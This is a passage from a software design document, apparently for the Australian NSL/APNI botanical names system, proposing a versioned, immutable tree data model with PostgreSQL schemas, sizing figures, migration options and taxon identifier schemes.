removed.\n\nAfter doing the spike and adding in all the additional data to make the trees autonomous we can compare actual data sizes.\nThese have been updated with the version join table instead of simple copies.\n\n\nIn APNI:\n\n|===\n| table | total size including indexes\n\n| tree_node\n| 284MB (inc 224MB index)\n\n| tree_event\n| 1328MB (inc 248kB index)\n\n| tree_link\n| 1434MB (inc 693MB index)\n\n| tree_element (152 versions)\n| 263MB (inc 95MB index)\n\n| tree_version_element (5.5M)\n| 4088MB (inc 2564MB index)\n|===\n\nwhich makes the new tree structure not much larger than the old one.\n\nNote: Prior to implementing the join table for version\/element tree_element table was consuming ~40GB of data for 150\nversions. The totals of table columns didn't add up to this amount, but there was something else the DB was doing to\nuse this space.\n\n==== Tree_Version_element \"link table\"\n\nInstead of copying the tree_elements each lime we just need to keep a link table of elements to tree versions, making\na many to many relationship. This adds a little complexity when archiving off older versions of trees, but at the same\ntime will reduce the need to archive.\n\nThe link table means that tree elements that don't change do not need to be copied. To copy a tree to draft is a matter\nadding the link table rows. New elements only participate in new trees.\n\nThis means we don't need to use a composite key for tree elements, we just use the element_id which can become the id.\n\nThe reason why we didn't initially do this was that the old tree changes the parent node quite often based on something\nelse changing on this or another branch. But... the changing parent doesn't mean something changed above that node, but\nthere *may* have been a placement change.\n\nIf the parent of a node does actually change in some material way we need to insert a new tree_element at the point where\nthe change happens. *This is not easy.*\n\nA simpler compromise for this is to only create a new tree_element when the parent changes. this will still replicate a\nlot of redundant data.\n\nThe diagram below demonstrates the problem. Nodes 5,6,7 have not changed, they have been added so that the tree from 5\ndown shows the addition of node 8. Node 3 is in both trees, it just has two parent links. We just want to have a version\n(say v2) point to 1, 2, 3, 4, 8. Which for two versions we could accomplish (if nothing above 8 changes) by using the previous\nnode link, but for if you look at node 9, 10, 11 it gets trickier to do.\n\nimage::multi-parent-node.svg[]\n\nWhat we need to do is compare the data in the nodes to check the parentage, in particular we need to check the instance\npath of the node. So for each daily version we create a tree based on instance path where we have a unique tree_element\nfor each instance path. We then map the tree_elements to a version.\n\n. for each top node (daily) recurse down the tree creating a table of:\n. [instance path id], instance path, node id, instance id, name id, parent instance path id, version number\n. group by instance_path, aggregate version numbers, aggregate node_ids\n. generate new tree elements for each instance path, using the parent instance path to set the parent tree_element\n. add tree elements to versions\n\n\n==== Finding sizes\n\n[source]\n.table-size.sql\n----\nSELECT\n *,\n pg_size_pretty(total_bytes) AS total,\n pg_size_pretty(index_bytes) AS INDEX,\n pg_size_pretty(toast_bytes) AS toast,\n pg_size_pretty(table_bytes) AS TABLE\nFROM (\n SELECT\n *,\n total_bytes - index_bytes - COALESCE(toast_bytes, 0) AS table_bytes\n FROM (\n SELECT\n c.oid,\n nspname AS table_schema,\n relname AS TABLE_NAME,\n c.reltuples AS row_estimate,\n pg_total_relation_size(c.oid) AS total_bytes,\n pg_indexes_size(c.oid) AS index_bytes,\n pg_total_relation_size(reltoastrelid) AS toast_bytes\n FROM pg_class c\n LEFT JOIN pg_namespace n ON n.oid = c.relnamespace\n WHERE relkind = 'r'\n ) a\n ) a;\n----\n\nNOTE: The new data structure allows us to partition and archive older versions should we need to.\n\nCopying the 35k tree_elements to a workspace takes about 12.8 seconds, *however we only need to add join table\nrows to make a copy* which is much quicker, 850ms.\n\n insert into tree_version_tree_elements (tree_version_id, tree_element_id)\n SELECT 9703722, tree_element_id from tree_version_tree_elements where tree_version_id = 152;\n\n\n===== VM info:\n appsint1 24GB RAM (18GB used) 50GB space with ~27GB free for tomcat\n pgsql-prod1-ibis.it.csiro.au 6GB RAM (5GB used)\n \/dev\/mapper\/vg_data-lv_data 50G 981M 50G 2% \/pg_data\n \/dev\/mapper\/vg_back-lv_back 100G 16G 85G 16% \/pg_back\n \/dev\/mapper\/vg_tbl1-lv_tbl1 100G 8.3G 92G 9% \/pg_tbl1\n \/dev\/mapper\/vg_xlog-lv_xlog 20G 257M 20G 2% \/pg_xlog\n\n=== Multiple workspaces\n\nBecause a workspace is just a copy of a version of the tree with pointers to the previous version of it's tree_elements,\nwe can implement a merge of the latest tree or a version (like a branch in GIT). A workspace or draft version of the tree\nwould reference the version it is a copy of and when you go to publish it, we check that the version of the current\ntree has not changed. If it has you would need to merge the current version of the tree with your draft version. Where\nthere are conflicts, i.e. the current version has changed a tree_element that you have also changed you need to resolve\nthe conflict by either accepting the current version, overwriting the current version with yours, or somehow merging the\nchanges. The workflow for a merge of conflicting changes is the trickiest bit.\n\nWhere different workspaces are working in different branches of the tree auto merging would be possible.\n\nMultiple workspaces would make long running projects more feasible, e.g. adding a branch of orchids as a single update.\n\nTalking to the current APC editors they considered the ability to have multiple workspaces and merging as something that\n\"was always a requirement, really\"\n\n=== Building new trees\n\nA new tree starts with an initial draft version which can be\n\n . a copy of an existing tree\n . entirely new, adding elements to the root of the tree\n . made up of copies of portions of other trees, by copying from a node down and placing that section under a node in\n the draft.\n\nOnce the initial draft is ready to be made \"public\" it is published as the first version.\n\n=== Tree paths\n\nThe current name tree path concept would be incorporated into the new tree_elements to provide a rapid way to display,\nsort, and search for items under (subtending) an element (currently called a node). We can then remove name_tree_path as\nan additional maintenance cost.\n\n=== Immutable\n\nThe immutability of published versions (apart from typographical fixes, mainly in the names\/references) means that we can\nuse de-normalisation of data to increase efficiency in display and queries. For example, storing a precomposed display\nstring for the tree, name and rank information (see name_tree_paths rank path and name path). This also makes trees largely\nstand alone when it comes to queries.\n\n****\nFor example you could search *just the tree elements* for a name string % abru% in family\nFabaceae of rank species that are native to WA.\n****\n\nThis will greatly improve the speed and simplicity of searches, especially given the right indexes.\n\nSince links are also immutable they can also be stored to reduce round trips to the mapper.\n\n=== Synonyms\n\nTo further make trees autonomous we need to store the synonyms of the name in the tree element data. This can be achieved\nby storing a names string, similar to the name path, that contains all the synonyms of the name separated by a pipe.\n\n e.g.\n |Acacia mucronata subsp. mucronata|Acacia mucronata var. linearis|Acacia mucronata var. mucronata|Racosperma mucronatum subsp. mucronatum\n\nThis means you can do a search for a name on a tree including the synonyms by doing:\n\n select * from tree_element where names like '%|Acacia mucronata var. linearis%';\n\nNOTE: after implementing the names string and testing various queries the speed benefit of having the synonyms in this\nformat wasn't there and the use cases need the extra information. So I have removed the names string format and just left\nthe synonyms jsonb data. Greg W pointed out it might be worth splitting synonyms into synonyms and relationships.\nI have replaced that string with a synonyms_html string for displaying the nomenclatural, taxanomic and missapplications.\n\nA jsonb synonyms field stores more synonym data. To do a synonym search on a JSONB field and take advantage of gin\nindexing we need to carefully structure the JSON data around a common search. This probably means grouping the synonyms\ninto relationship types e.g.\n\n[source,javascript]\n.synonyms.json\n----\n{\n \"Isoetes drummondii var. anomala\" : {\n \"mis\" : false,\n \"nom\" : true,\n \"tax\" : false,\n \"type\" : \"nomenclatural synonym\",\n \"cites\" : \"Britton, D.M. & Brunton, D.F.(1991), < i > Fern Gazette < \/i> 14\",\n \"name_id\" : 205871,\n \"full_name_html\": \"<scientific><name id='205871'><scientific><name id='64421'><scientific><name id='64341'><element class='Isoetes'>Isoetes<\/ element > < \/name><\/ scientific > < element class = 'drummondii' > drummondii < \/element><\/ name > < \/scientific> <rank id='54412'>var.<\/ rank > < element class = 'anomala' > anomala < \/element> <authors><ex id='7577' title='Marsden, C.R.'>C.R.Marsden<\/ ex > ex < author id = '5138' title = 'Britton,D.M. & amp; Brunton ,D.F.'>D.M.Britton & D.F.Brunt.<\/author><\/authors><\/name><\/scientific>\"\n },\n \"Isoetes drummondii subsp. nov. (polyploid)\": {\n \"mis\" : false,\n \"nom\" : true,\n \"tax\" : false,\n \"type\" : \"nomenclatural synonym\",\n \"cites\" : \"Ross, J.H.in Ross, J.H.(ed.)(1993), < i > A Census of the Vascular Plants of Victoria < \/i> Edn. 4\",\n \"name_id\" : 205964,\n \"full_name_html\": \"<scientific><name id='205964'><scientific><name id='64421'><scientific><name id='64341'><element class='Isoetes'>Isoetes<\/ element > < \/name><\/ scientific > < element class = 'drummondii' > drummondii < \/element><\/ name > < \/scientific> <rank id='54410'>subsp.<\/ rank > < element class = 'nov. (polyploid)' > nov.(polyploid) < \/element> <authors><author id='7781' title='Ross, J.H.'>J.H.Ross<\/ author > < \/authors><\/ name > < \/scientific>\"\n }\n}\n----\n\n=== Profile data \/ attributes\n\nThe Profile data will be stored as a JSON object\/document field in the tree_element. This allows arbitrary extension of the\nprofile data to be stored. It also provides a consistent versioned view of the Profile data. e.g.\n\n[source,javascript]\n.profile.json\n----\n{\n \"APC Dist.\" : {\n \"value\" : \"Tas\",\n \"source_id\" : 9928,\n \"created_at\" : \"2007-06-06T00:00:00+10:00\",\n \"created_by\" : \"APNI-NSL MIGRATION\",\n \"updated_at\" : \"2007-06-06T00:00:00+10:00\",\n \"updated_by\" : \"APNI-NSL MIGRATION\",\n \"source_system\": \"APC_CONCEPT\"\n },\n \"APC Comment\": {\n \"value\" : \"Previous references to this species on mainland Australia refer to I. muelleri (Chinnock, 1998).\",\n \"source_id\" : 9928,\n \"created_at\" : \"2007-06-06T00:00:00+10:00\",\n \"created_by\" : \"APNI-NSL MIGRATION\",\n \"updated_at\" : \"2007-06-06T00:00:00+10:00\",\n \"updated_by\" : \"APNI-NSL MIGRATION\",\n \"source_system\": \"APC_CONCEPT\"\n }\n}\n----\n\n\n\n==== Comments\n\nComments will be stored as a text comment field in the JSON profile data.\n\n==== Distribution\n\nDistribution data is currently just unstructured and unvalidated text. However a *lot* of the requests for information\nrely on the distribution data, and the correct interpretation of that data. Since distribution data is part of the\nprofile data requirement now is a good time to tackle this.\n\nTo this end we will make the distribution profile data a JSON object in the profile field containing pointers to\ndistribution data combinations. Distribution data combinations consist of a region and a set of flags in a legal\ncombination much the same way as name_status is set up. We use a JSON field because there is a variable number of regions\nthat can be assigned to a concept (tree_element) and we don't want to make outward pointing join tables to tree_elements.\n\nThis design helps keep trees stand alone, while linking back to distribution combinations and allowing the distribution\ndefinition to be extended, while providing the editor with a configurable set of valid profile combinations.\n\nThe Distribution field of the profile will contain a list of JSON object representations of the distribution combinations\nincluding the id of the combination for update purposes.\n\n=== Archiving\n\nThe data structure allows for archiving of versions by moving\/exporting a tree version. The structure keeps all the data\ncontained in the tree itself. Versions are immutable or read only, and self contained. Operations that need to interact\nwith the tree are limited to the workspaces\/drafts, and perhaps some advanced search operations on the current version.\n\nBy storing the Name, display string, Rank Path, and links on the tree, older versions can be displayed and queried without\nreferring to the rest of the NSL database, making it possible to have a service which can display the tree as it was from\narchived version in a different database.\n\nThis also means exporting a tree version provides 'all' the data needed to describe the tree.\n\n=== [.line-through]#Composite keys for tree_elements#\n\n\nNOTE: We have moved to a join table for the elements to tree versions so we don't need a composite key. A join table\ndoesn't reduce the advantages except for the identification of nodes to tree elements due to needing a unique tree_element\nid that is not related to node id.\n\nIt would be worth looking at using composite keys for tree_elements made up of the tree_version id and the tree_element id\nthat way we can copy the tree_elements and just change the version number.\n\nThe advantages of this are:\n\n . dramatically reduces the number of id's we have to generate out of the globally unique ID pool\n . intrinsically tracks nodes from one version to the next\n . simplifies the copy process a little\n . may help in diffing trees ( grab all the tree_elements with the same id across versions )\n . lets you very quickly find what an old version of a tree_element looks like now and ask questions like is this in\n the current version without any tree walks.\n\nDisadvantages are:\n\n . Looking up by id always requires the version\n . slightly trickier ORM mapping\n\nI think just advantage 1 outweighs the disadvantages because 100 x 35000 = 3,500,000 new IDs per year when the majority of\nthe data doesn't change. The rest of the advantages come down to speed and efficiency.\n\n=== Auditing\n\nA single updated by and updated at field is required in the tree_element since changes are versioned.\n\n== Transition\n\nWe will identify and replace the existing service endpoints for the Instance Editor to maintain functionality with the\nchange over. The tree editor functionality will need to be changed or incorporated into the Instance Editor. This work\nneeds to happen anyway.\n\n=== Existing history\n\nThere are currently:\n\n * 114k current APC nodes, including 35k taxon nodes and 79k value nodes.\n * 365k taxon nodes for any tree (including the APNI name tree)\n * 7M links.\n * 2995 versioned changes to the APC tree\n\nThe version changes date back to 2012-02-09 via the APC import. Greg Whitbread has suggested that we could discard all the\nhistorical changes up to a point, and considering no one would have relevant links that are currently supported.\n\nLooking in the mapper we only have mapped these older URI:\n\n * apni.name\/\n * apni.publication\/\n * apni.reference\/\n * apni.taxon\/\n\nNone of which refer to tree information, or nodes.\n\nWe currently map 63k node objects in the mapper across all trees, 48k nodes in apni (vascular shard).\n\nThere are 315k taxon nodes out of 365k (apni shard) that are _not_ in the mapper and therefore have never been referenced.\nThere are 67k APC taxon nodes out of 115k APC taxon nodes that are _not_ in the mapper and so haven't been referenced.\nThere are only 5 nodes in the current APC tree that are not in the mapper.\n\nHow much history should we keep? We can import from 2016 and delete history later.\n\n=== option 1\n\nBased on the above stats we should be able to work out which of the 2995 versions of the tree we have currently are in\nthe mapper and and just replicate those versions to maintain the mapped links. Doable, but tricky.\n\n*NOTE* it's possible that we have shared links to nodes that are _not_ in the mapper via the APC taxon exports. These\nlinks are created in SQL, but may not have been created in the mapper because no one has referred to them via the services.\nWe could fix this by adding all nodes since the APC taxon exports started being used (with node links). There are 5 nodes\nin the current APC tree that are not in the mapper.\n\n=== option 2\n\nDraw a line in the sand, then group changes. We can be sure that no links to the tree exist before the NSL was launched,\nso we can ignore all versions before January 2015 (leaving us with 2643 versions). Then group versions into monthly\nreleases and point all node links in that month to the final version of the node for that month. This brings it down to\naround 30 versions.\n\nThis somewhat breaks the contract that what was cited is what we get back, however the number of citations where the\nchanges incurred matter would, I guess, be approaching zero? I say that because by and large the changes per version are\nfor a single item, so while december 2015 saw 132 versions each one was for a single name, e.g.\n\n.version changes\n|===\n|note |time stamp\n\n|update name 5416769|2015-12-23 09:34:44.212000 +11:00\n|update name 81345|2015-12-23 09:33:52.836000 +11:00\n|update name 5417736|2015-12-23 09:32:46.223000 +11:00\n|update name 5419222|2015-12-23 09:31:40.348000 +11:00\n|update name 80372|2015-12-23 09:29:25.683000 +11:00\n|add name 80912 to name 80855|2015-12-23 08:49:16.608000 +11:00\n|add name 80899 to name 80855|2015-12-23 08:48:29.840000 +11:00\n|add name 80878 to name 80855|2015-12-23 08:47:15.710000 +11:00\n|===\n\nTake these changes adding excluded names to Correa pulchella J.B.Mackay ex Sweet which is this node\nhttps:\/\/id.biodiversity.org.au\/node\/apni\/5424450 at 2015-12-23 08:49:16.608000 +11:00 but was a different\nnode 3 minutes earlier. The reality is that these changes were meant to be done as a batch and should only have been\npublished once.\n\n==== option 2a\n\nWe could modify this option to group changes in a day to a single version, in which case I doubt anyone would notice.\nThis would not dramatically increase the number of versions saved as tree work seems to be limited to a few days a month\nwhich comes out as a total of 206 versions from 2015-01-01.\n\n=== Declared BTs\n\nDeclared BT tree_elements will be removed from history and where we can the excluded names attached to the BT will\nbe linked ot the BTs parent directly. Most of the time this will mean the top of the tree. This will create a consistent\ntree in the history.\n\n=== Existing links\n\nNOTE: A link to a node in the old structure only gives you the structure *below* it as it was when you took the link\nunless you took a link to a changed node further up the tree, or the top node. Although it is possible to find the\nversion of the tree you were looking at it was *not* intrinsic in the link. The node identifier is effectively a taxon\nconcept identifier.\n\nWe can take existing published links and forward them to new links. Due to history only being maintained in node links\nbelow that node we need node links to point to the latest version that has that node id.\n\nWith the change to using a join table we lose the node_id\/tree_element relationship, so we either need to store the\nnode id(s) in the tree_element or just use the mapper to map to the tree_element.\n\nThe most appropriate solution is to use the mapper to map node URI to tree_elements. They will resolve more appropriately\nto a _taxon identifier_.\n\n==== new links\n\nWe need to be able to encode the version into the tree links since tree_version_element effectively uses a composite key.\n(In the current implementation this element_link in tree_version_element *is* the PK)\n\nLinks currently are structured as ...\/object\/namespace\/number, e.g. node\/apni\/7845073, where the namespace so far\nhas been directly related to the shard. Trees are meant to be above\/separate to shards, so perhaps we should move to\nstoring the shard specifically in the identity structure in the mapper (it's more of a system identifier). This way\nwe can use the namespace as intended and have tree element links like:\n\n ...\/tree\/137\/7845073 i.e. effectively tree\/version\/element\n\nWARNING: The ID of tree_element should be _GLOBALLY UNIQUE_ so it *can* be copied from one tree to another on different\nsystems.\n\nthis lets us map any tree version to any shard\/uber service directly.\n\nThe mapper configuration handles the namespace to system mapping.\n\nThis URL scheme is useful for debugging.\n\nNOTE: Previously links were only created in the mapper when they were requested by the services - This was not intended\n to be the default way to make links, but... So when a workspace is created we do a bulk add of identifiers to\n the mapper. We need to add a bulk add api call on the mapper (done).\n\nThe mapper currently handles around 1.15 million identities without problem, and is designed to scale out via load\nbalancing if needed.\n\nNOTE: tree_elements store links to instance and name. The tree_version_element holds the \"element link\" to itself. The\nelement link is the primary key of the tree_version_element join table.\n\n==== taxon identifiers\n\nSince taxon identifiers exist in multiple versions of different trees (since they represent the taxon concept regardless\nof version) the question becomes how do you resolve a taxon concept? In the sense of this document it becomes clear that\na taxon concept is a fixed representation of the branch below a taxon, and the data contained within the circumscribed\ntaxa. So a taxon concept is fixed or immutable and exists outside of versions (so it may not be the current concept used)\nwhich means we can choose the concept from any version (by definition they are the same).\n\nWARNING: There are significant questions regarding use of taxon ID. Ideally the instance ID *is* the taxon ID\nbut the child taxa are not defined within an instance, they are described on a tree. If you change the sub taxa\nthe instance should change, but if you just haven't fully described the concept represented by the instance then the\ntaxon is the same. A taxon ID as described here represents what has been described in this tree so far, not what the\nconcept represents.\n\n.*_CONCLUSION_*\n\n****\nI have decided for the purposes of getting a working tree that is manageable that we should *not* track and create\ntaxon IDs as such. We can provide a comparison service end point (even a database function) to compare taxa in trees\nat a point. The user can compare Instance IDs as the definition of a Concept of a taxon, then compare two trees\nrepresentation of that taxon and all it's sub taxa. Just because the representation in a tree is slightly different\nthe taxon they are *trying* to represent may be the same, they just made a mistake or haven't completed the task.\n\nIt can be left as a later excercise to create services that track taxa and validate their use, i.e. if someone re-uses\nan instance in another tree, does it contain *only* the same taxa in the same order?\n****\n\n===== A circumscription hash\n\nSo we could resolve a taxon using something like:\n\nhttp:\/\/id.biodiversity.org.au\/taxon\/80dd7fffd995817fe1a4d4494c519a0c1aa38803b394f69482ab5c794318e0a9\n\nTo generate the hash taxon identifier we use the [.line-through]#tree paths# instance paths of the parent and the\nchildren within that version:\n\nNOTE: We changed from the tree path to the instance path above because the tree element id changes on editing and it\nbecomes very tricky to track taxon changes, or element changes that have no net effect, e.g. moving a taxon to another\nfamily and then moving it back. By using the instance id path we can use the query below to check if a taxon has changed\nbecause the instance should not have changed.\n\n[source]\n.circumscribe.sql\n----\nCREATE EXTENSION pgcrypto;\n\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT sha256_agg(paths)\nFROM (\n SELECT e.instance_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.instance_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n----\nsee <<A simple sha256_agg function>>\n\nThe circumscribe function above is a unique hash of all the children in order under a taxon (including that taxon). The\ncurrent worst case time for calculation of Plantae is ~2 seconds when placing a new leaf taxon we need to take the\ntree path of that taxon and re calculate the taxon identifier hash for all the tree_version_elements in that path. Given\nabout 11 levels those calculations should take less than 22 seconds, and could be updated in the background.\n\nWe can drop the hash and use a simple array of instance ids for comparisons e.g.\n\n[source]\n.circumscribe.sql\n----\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS BIGINT[]\nLANGUAGE SQL\nAS\n$$\nSELECT array_agg(paths)\nFROM (\n SELECT e.instance_id paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.instance_path LIKE path_match || '%'\n ORDER BY e.instance_path\n) AS circumscription;\n$$;\n----\n\nThe difference in speed is around 300ms which would be significant in bulk operations, and this provides real\ndata that can be used (instance ids).\n\n===== More efficient method\n\nAll tree_elements have a hash of the tree_path. The tree_path (and tree_element as a result) guarantees that the path\nabove matches the taxon, so we only need to include the children to show difference. We also only need the leaf taxon in\nthe hash, because they contain the path of the entire branch to the top of the tree.\n\n. Leaf tree_version_elements use the hash from the tree_element as taxon hash.\n. Parent tree_version_elements concatenate immediate child taxon hashes and hash that.\n. up one level and repeat.\n\nWhen we add a taxon (leaf) we use the tree_elements hash as the new taxon hash then follow the tree path up regenerating\nthe taxon hash for each tree_version_element up the tree as above.\n\nThis method would be more efficient in production, but the initial generation is trickier with a reverse tree walk.\n\n==== Even more efficient and pragmatic method\n\nThe Hash methods have an elephant in the room, Hashes. A Hash can clash, they're good for cases where the data doesn't\nexceed the number of different hashes. Sha256 has a lot of hashes and can represent billions of separate bits of data\nbut we can't guarantee there won't be a clash. The best way to use a hash is to reduce the length of the data\nrepresented by the hash. We can determine the uniqueness of a taxon (the circumscription of children and the taxon itself)\nusing the sum of the tree_paths of the leaf tree_elements. This effectively represents the tree, in fact it's just printing\nout the tree id's in order (depth first) as a string. The above hash methods take that string and hash it. The string\ncontains a lot of repetition, but it is unique to this taxon... it *is* this taxon.\n\nAt last count we have 5.4 million tree_version_elements, 38 thousand tree_elements, and by the look of it around 40k\nindividual taxon. *It would be simpler to just assign an ID to a new taxon.* In fact, we already use the node ID to\nidentify the taxon, so we can just keep them as taxon identifiers and generate new ones when we add a taxon:\n\n. Add (or Remove) a leaf element and assign the tree_version_element a new taxon ID\n. use the tree_path to assign new taxon IDs to all the tree_version_elements up the branch\n. profit.\n\n===== cons?\n\nIf we do this every time a taxon is added to the tree in a draft we will go through a lot of identifiers. We could check\nto see if the identifier is new to this version and only change it once per version, but that is probably unnecessary\noverhead...\n\nLets' say we add 100 taxa in this version at forma level (about 10 levels down from Plantae) all under the same species,\nthen we'll use 1100 identifiers for 110 new taxa.\n\nNOTE: implementation includes a uniqueness check on taxon identifiers when assigning them within a draft version. This\ndoes a count on tree_version_elements with the taxon identifier, if it returns just 1 then this is the only usage and is\na draft so it can be kept as the taxon identifier as it hasn't been published.\n\nIt doesn't intrinsically tell us if two taxa on different trees are the same. If you copy a taxa from one tree to another\nwe could use the same identifier, but if you create a copy of a taxa from parts, you would have a new identifier. We can\nprovide a service to compare taxa, but finding matching taxa across different trees would be relatively expensive (you\ncould use a tree comparison\/diff to identify matches). Once you know two taxons are the same with different IDs you then\nneed to combine the identifiers somehow, perhaps in a matching service.\n\nNOTE: We have added instance path to tree_elements to help us track\/compare taxon. This is because the above method means\na new taxon identifier will be generated when you move a taxon somewhere else then move it back to where it was. There\nis no way to check that it's actually the same taxon. So we can use <<A circumscription hash>> on instance_path.\n\n=== RDF\n\nWe will need to map the new tree structure in joseki. There is a project called nsl-data, that is in the old git\nrepository. The nsl-data\/src\/apni.ttl file contains around 400 lines of mapping config (lines 2057 - 2457) which will\nneed to be reconfigured and deployed.\n\nCurrently the RDF services are apparently largely unused, so we should be able to re-map to a structure that makes\nsense.\n\n=== Uber trees\n\nThe new structure caters for uber trees by easily allowing trees to be copied and providing very fast mechanisms for\nsearch and display. Two million records is certainly not excessive to copy or refer to. It is not expected that people\nwill edit the uber tree directly so workspace versions would not normally be required.\n\nWe need to provide a mechanism to describe and build an uber tree that potentially watches the component trees to build\ncurrent uber tree.\n\nTwo million record tree would be expected to take up around 285MB based on the estimated data usage figures quoted above\nfor 35k names.\n\ndoing a select on 4 819 443 tree_version_elements and ordering by name_path on my local machine took 250ms\n\n sql> select te.simple_name, te.name_link, tve.element_link tree_link, tve.name_path\n from tree_element te\n join tree_version_element tve on te.id = tve.tree_element_id\n [2018-11-28 13:46:28] 2000 rows retrieved starting from 1 in 249 ms (execution: 144 ms, fetching: 105 ms)\n\nafter optimising postgresql this came down to 1m 40s.\n\nWith an index on name_path a search for everything under Eucalyptus on 4.8M tree_elements (159213 results 2000 fetched)\ntakes ~200ms.\n\n sql> select te.simple_name, te.name_link, t.host_name|| tve.element_link tree_link, tve.name_path\n from tree_element te\n join tree_version_element tve on te.id = tve.tree_element_id\n join tree t on tve.tree_version_id = t.current_tree_version_id and t.accepted_tree\n where name_path like '%\/Eucalyptus\/%' order by name_path\n [2018-11-28 13:42:41] 1168 rows retrieved starting from 1 in 203 ms (execution: 137 ms, fetching: 66 ms)\n\nMore machine grunt may improve performance. (After optimising postgresql this came down a lot)\n\n****\nMy local machine is an i7-4820K 3.70GHz CPU x 4, 32GB machine with a 500GB Samsung SSD. Postgresql had not been optimised\nfor this machine yet.\n****\n\nCopying 2 million tree_elements into a new table takes around 9.6s\n\n sql> select * into new_tree_elements from tree_element where tree_version_id > 80\n [2017-06-26 17:37:30] completed in 9s 618ms\n\n\nGiven it takes about 12 seconds to copy\/insert 35k tree_elements into the tree_elements table to make a workspace\nit should take around 11 minutes to copy an entire 2 million element tree. We shouldn't have to copy the entire uber\ntree of this size very often.\n\nNOTE: This copy was done on an older structure. We still copy the draft tree, but the process takes a little longer\nbecause we bulk load the identifiers by sending the list of identifiers to add to the mapper. This process currently\nneeds some more optimisation.\n\n== What it looks like\n\nimage::new-tree-overview.svg[]\n\n== The model\n\n[source]\n.DDL.sql\n----\n create table tree (\n id int8 default nextval('nsl_global_seq') not null,\n lock_version int8 default 0 not null,\n accepted_tree boolean default false not null,\n config jsonb,\n current_tree_version_id int8,\n default_draft_tree_version_id int8,\n description_html Text default 'Edit me' not null,\n group_name Text not null,\n host_name Text not null,\n link_to_home_page Text,\n name Text not null,\n reference_id int8,\n primary key (id)\n );\n\n create table tree_element (\n id int8 default nextval('nsl_global_seq') not null,\n lock_version int8 default 0 not null,\n display_html Text not null,\n excluded boolean default false not null,\n instance_id int8 not null,\n instance_link Text not null,\n name_element varchar(255) not null,\n name_id int8 not null,\n name_link Text not null,\n previous_element_id int8,\n profile jsonb,\n rank varchar(50) not null,\n simple_name Text not null,\n source_element_link Text,\n source_shard Text not null,\n synonyms jsonb,\n synonyms_html Text not null,\n updated_at timestamp with time zone not null,\n updated_by varchar(255) not null,\n primary key (id)\n );\n\n create table tree_version (\n id int8 default nextval('nsl_global_seq') not null,\n lock_version int8 default 0 not null,\n created_at timestamp with time zone not null,\n created_by varchar(255) not null,\n draft_name Text not null,\n log_entry Text,\n previous_version_id int8,\n published boolean default false not null,\n published_at timestamp with time zone,\n published_by varchar(100),\n tree_id int8 not null,\n primary key (id)\n );\n\n create table tree_version_element (\n element_link Text not null,\n depth int4 not null,\n merge_conflict boolean default false not null,\n name_path Text not null,\n parent_id Text,\n taxon_id int8 not null,\n taxon_link Text not null,\n tree_element_id int8 not null,\n tree_path Text not null,\n tree_version_id int8 not null,\n updated_at timestamp with time zone not null,\n updated_by varchar(255) not null,\n primary key (element_link)\n );\n\n----\n\nRefer to code at\nhttps:\/\/github.com\/bio-org-au\/nsl-domain-plugin\/blob\/8685491bc3916f5615d9716465fe622c32deebfe\/web-app\/sql\/nsl-ddl.sql#L735[github]\n\n---\n\nIMPORTANT: This has been implemented in production so the Impact and Amount of work information below is only useful for\nretrospective evaluation. Skip to <<Query Examples>>\n\n---\n== User impact of change over\n\nCurrently in production:\n\n * a taxon can be added or removed from a tree.\n * the status of the taxon can be changed from accepted to excluded.\n * the comment and distribution values on the tree can be updated, but are not used as instance notes are used instead.\n\nSynonymy does not affect the tree structure as such, as that is related to the concepts that are placed on the tree only.\nThere is no current process to determine if changes to synonymy of taxon concepts (instances) affect the tree, in terms\nof the rules governing placements.\n\nPlacement rules are currently poorly implemented and incomplete.\n\nIn the change over the initial goal will be to replace the existing functionality. We should be able to do this without\nmajor impact or change.\n\n== Amount of work\n\nThere main functional areas affected by this change:\n\n . Search\n . Display\n . Editing\n\nWe would also need to factor out NameTreePath as it is replaced by the new TreeElement and the APNI name tree.\n\nI'm guestimating the amount of work to be around 340 hours in total, which depending on other work could be completed\nin 8 weeks.\n\n=== APNI Name Tree\n\nNow would be the right time to replace the APNI name tree if we're going to do that. JIRA NSL-2304 discusses the issues\naround the name tree being replaced. There is definitely a current need for a tree structure that caters for names that\naren't in the APC\/taxonomic tree.\n\nThe solution suggested in NSL-2304 is to replace Name.sortName with a tree path as per the tree_element and existing\nname_tree_path, and putting the \"agreed\" family of a name in the name where that name is below family. Name id path\nwould be a logical addition to speed up any other name path operations, but we may say\nhttps:\/\/en.wikipedia.org\/wiki\/You_aren%27t_gonna_need_it[YAGNI] on this initially.\n\nTo do this we would do this (in order):\n\n. copy the APC name path to all names in APC\n. copy the APC name path to all synonyms of names on the tree\n. follow name.parent up the tree for names not in APC till we reach a name in APC to build their path.\n\nIn the last step we can stop once we hit a name with a name path, which makes this more of a functional step.\n\nThis still means editors should put the immediate parent of a name in, not the \"Name parent\" as we're still using the\nname tree as a filler for what isn't in APC.\n\n=== Search and display\n\n==== Services\n\nIn the current services we use a search including the tree_nodes to determine if a name is on a tree and where it is\nranked on that tree. We also look to see if a name is in APC to display an APC tick. This has been generalised somewhat\nto allow different \"accepted\" trees.\n\nWe need to refactor:\n\n|===\n|work| notes| effort\n| search and APC\/APNIFormat outputs.| -| 20h\n| tree path code to use the tree_element | will mostly be deleting code that keeps up with tree_node changes| 20h\n| The APNI name tree needs to be replaced | just use the name parent, and make sure Family comes from the accepted\ntree only. Extra time allowed for implementation discussion.|40h\n| tree services API | most of it is deleted.| 40h\n| Tree object representation| -|20h\n| flat view taxon and name exports | rework the view| 10h\n| test infrastructure and tests| -| 30h\n|| -|180h\n|===\n\nObviously the existing tree structure is used extensively in the services for the \"tree services\", but most of that will\njust go and be replaced with a much simpler set of code. The search service and APNI\/APC format out put are the only\nother places that use them along with name_tree_path.\n\n===== Objects representation in HTML\/JSON\n\nCurrently the tree nodes are modeled with and output object which in html looks like\nhttps:\/\/biodiversity.org.au\/nsl\/services\/node\/apni\/9159708\n\nThe JSON version exposes too much of the tree infrastructure by 